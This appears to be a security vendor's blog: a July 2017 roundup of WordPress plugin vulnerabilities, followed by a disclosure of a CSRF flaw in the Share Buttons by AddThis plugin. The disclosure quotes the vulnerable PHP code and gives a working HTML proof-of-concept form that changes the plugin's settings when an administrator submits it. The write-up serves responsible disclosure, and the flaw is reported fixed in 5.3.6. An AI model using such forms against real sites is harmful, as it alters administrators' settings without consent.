01 Aug

What Happened With WordPress Plugin Vulnerabilities in July 2017

If you want the best information and therefore best protection against vulnerabilities in WordPress plugins we provide you that through our service.

Here is what we did to keep those are already using our service secure from WordPress plugin vulnerabilities during July (and what you have been missing out on if you haven’t signed up yet):

Plugin Security Reviews

Customers of the service can suggest and vote on plugins to have a security review done by us. This month we released details for a review of:

Plugin Vulnerabilities We Discovered and Publicly Disclosed This Month

We don’t just collect data on vulnerabilities in plugins that others have discovered, we also discover vulnerabilities while monitoring hackers activity, reviewing other vulnerabilities, and by doing additional checking on the security of plugins.

This month the most concerning vulnerability is a PHP object injection vulnerability in Product Reviews, since that type of vulnerability is likely to be exploited and the vulnerability hasn’t been fixed yet.

Plugin Vulnerabilities We Helped Get Fixed This Month

Letting you know that you are using a vulnerable version of plugin is useful, but it is much more useful if you can fully protect yourself by simple updating to a new version. So we work with plugin developers to make sure that vulnerabilities get fixed. This month we helped to get vulnerabilities fixed in plugins that have 702,300+ active installs:

Plugin Vulnerabilities Added This Month That Are In The Current Version of the Plugins

Keeping your plugins up to date isn’t enough to keep you secure as these vulnerabilities in the current versions of plugins show:

Additional Vulnerabilities Added This Month

As usual, there were plenty of other vulnerabilities that we added to our data during the month. Most of the new vulnerabilities that were fixed this month are relatively minor.

19 Jul

Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Share Buttons by AddThis

We recently found that the plugin Share Buttons by AddThis had a cross-site request forgery (CSRF)/settings change vulnerability. When setting the plugin’s settings by clicking the Save Options button on the plugin’s settings page proper protection against CSRF exist, but it doesn’t for an alternate method when the plugin is set be controlled from “AddThis.com”.

When it is controlled that way the addthisAsyncLoading function is accessible through WordPress’ AJAX functionality (in the file /addthis-for-wordpress.php):

64
add_action( 'wp_ajax_at_async_loading', array($this, 'addthisAsyncLoading'));

That function checks to make sure the request is coming from some with “manage_options” capability (which is normally only Administrators), but doesn’t check for a valid nonce to prevent CSRF before updating the plugin’s settings:

612
613
614
615
public function addthisAsyncLoading()
{
	if (current_user_can( 'manage_options' ) && $this->_checkAsyncLoading()) {
		$updateResult = $this->updateSettings($this->_postVariables);

After we notified the developer of the issue they resolved it in version 5.3.6 by removing the code shown above from the plugin.

Proof of Concept

The following proof of concept will cause the AddThis Profile ID setting to be changed to “test”, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="at_async_loading" />
<input type="hidden" name="async_loading" />
<input type="hidden" name="addthis_settings[addthis_profile]" value='test' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • June 26, 2017 – Developer notified.
  • June 26, 2017 – Developer responds.
  • July 13, 2017 – Version 5.3.6 released, which fixes vulnerability.